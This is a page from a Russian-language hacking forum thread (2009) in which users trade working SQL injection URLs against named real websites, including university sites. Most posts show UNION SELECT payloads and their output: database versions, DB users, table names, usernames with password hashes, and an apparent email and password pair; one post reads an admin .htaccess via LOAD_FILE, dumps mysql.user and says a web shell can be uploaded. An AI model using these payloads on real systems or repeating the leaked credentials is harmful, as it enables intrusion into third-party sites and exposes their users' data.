ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9771  
Старый 09.06.2009, 14:08
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.thefashioninsider.com/mobil.php?rub=supermodels&id=35+and+substring(version(),1,1)=3
Код:
http://comicstrip.ca/make.php?id=282+and+substring(version(),1,1)=5
 
Ответить с цитированием

  #9772  
Старый 09.06.2009, 14:23
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.cis.uab.edu PR 5
Код:
http://www.cis.uab.edu/news/sem_details.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6/*
Database version : 4.1.20-log
Database name : db
User name : web@monkey.cis.uab.edu
 
Ответить с цитированием

  #9773  
Старый 09.06.2009, 14:37
Аватар для udman
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

http://www.scorcher.ru
Цитата:
http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,user(),ve rsion(),database()),2,3,4,5,6,7,8,9
scorcher0@localhost
5.0.27
scorcher


Юзеры какие-то
Цитата:
http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,emailAddress,pa ss wd,realName),2,3,4,5,6,7,8,9+FROM+yabbse_members+L IMIT+0,1
fornit@wmail.ru
af2dyfoj97nAU
fornit

Автор сайта походу постебатся решил над хакерами ))
Цитата:
http://www.scorcher.ru/hruk/hruk.php
 
Ответить с цитированием

  #9774  
Старый 09.06.2009, 14:57
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://leoshow.com/short.php?id=-33+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9/*
4.0.27-log:artmasterofby@eclipse.tutby.com:artmasterofby
 
Ответить с цитированием

  #9775  
Старый 09.06.2009, 15:03
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.adecor.ru/plastic-one-subitem.php?item_id=1&subitem_id=-6+union+select+1,table_name,3,4+from+information_s chema.tables+/*+

http://adekor.ru/plastic-one-subitem.php?item_id=2&subitem_id=-10+union+select+1,table_name,3,4+from+information_ schema.tables+/*+

http://www.superkrovlya.ru/files/print_page.php?ID=&t=d&mid=-151+UnIoN+SeLecT+database(),2,3,4,5,6,7,8+/*+&item_id=54

http://www.partymaker.lv/?l=-1'+union+select+1,2,3,concat_ws(0x3a3a,database(), version()),5,6,7+--+&item_id=13
partymaker::4.0.26
 
Ответить с цитированием

  #9776  
Старый 09.06.2009, 15:28
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.mbvo.wwu.edu PR 5
Код:
http://www.mbvo.wwu.edu/abstracts/abstractText.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
Database version : 5.0.75
Database name : mbvo
User name : mbvoUser@localhost
 
Ответить с цитированием

  #9777  
Старый 09.06.2009, 15:37
Аватар для BHYCHIK
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

Уязвимость на сайте http://www.marcialpons.es

Уязвимый скрипт: http://www.marcialpons.es/fichalibro.php?id=100708769

Версия БД: 4.1.20
Имя БД: Libreria
Юзер: root@localhost
ОС: redhat-linux-gnu

Директория сайта:
/var/www/html

Есть привелегия типа файл, вот .htaccess в папке admin:
http://www.marcialpons.es/fichalibro.php?id=100708769%27+and+0+union+select+ 1,2,3,LOAD_FILE(%27/var/www/html/admin/.htaccess%27),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,8 5--+

Можно залить шел.

Есть доступ к mysql.user
http://www.marcialpons.es/fichalibro.php?id=100708769%27+and+0+union+select+ 1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85+from+mysql.user--+

Моё видео со взломом этого сайта
http://forum.antichat.ru/showthread.php?p=1319721#post1319721
 
Ответить с цитированием

  #9778  
Старый 09.06.2009, 15:51
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.evergreenrecreation.com PR 4
Код:
http://www.evergreenrecreation.com/facilities.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12/*
Database version : 4.1.25-Debian_mt1
Database name : db49768_eprd
User name : db49768@72.47.224.21

users:
Код:
http://www.evergreenrecreation.com/facilities.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12+from+users/*
username : eprdadmin
password : 665c6986e7fbd5ef7c89d2cbb1464f2b
 
Ответить с цитированием

  #9779  
Старый 09.06.2009, 16:00
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

3-ий мускул
http://www.1019thewave.com/community/promo.php?id=12+and+substring(version(),1,1)=3
----------------
http://www.mygreatfood.com/promo.php?id=-2+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11,12,13,14,15
5.0.45:mygreatfood@localhost:mygreatfood

куча таблиц, на что-то интересное похожф MemberInfo
 
Ответить с цитированием

  #9780  
Старый 09.06.2009, 16:10
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://nmefc.nmt.edu PR 4
Код:
http://nmefc.nmt.edu/ContactUs.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())--
Database version : 5.0.67-0ubuntu6
Database name : nmefc
User name : nmefcpub@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ